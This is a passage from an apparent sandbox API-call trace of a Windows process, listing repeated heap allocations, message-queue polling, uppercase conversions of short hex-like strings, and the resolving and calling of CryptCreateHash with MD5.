Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.976] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.976] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.976] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.976] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0087.976] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0087.976] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.976] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0087.976] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.976] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.976] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.976] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.976] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0087.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0087.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0087.977] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0087.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0087.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0087.977] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0087.977] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0087.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.977] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0087.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.978] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0087.978] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.978] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0087.978] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.978] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0087.978] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0087.979] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0087.979] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0087.979] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0087.979] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0087.979] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.979] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0087.979] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.979] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0087.979] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.979] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.979] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.980] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.980] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.980] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.980] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.980] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0087.980] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0087.980] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.980] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0087.980] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.980] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.980] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.981] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.981] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0087.981] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0087.981] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.981] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.981] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.981] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.981] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.981] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0087.981] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.981] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.982] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0087.982] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.982] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.982] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9e68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0087.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.982] GetProcAddress (hModule=0x76390000, lpProcName="CryptCreateHash") returned 0x763aeed0 [0087.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.982] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.982] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0087.983] CryptCreateHash (in: hProv=0x9961a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0087.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0087.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.983] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.983] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.984] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.984] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 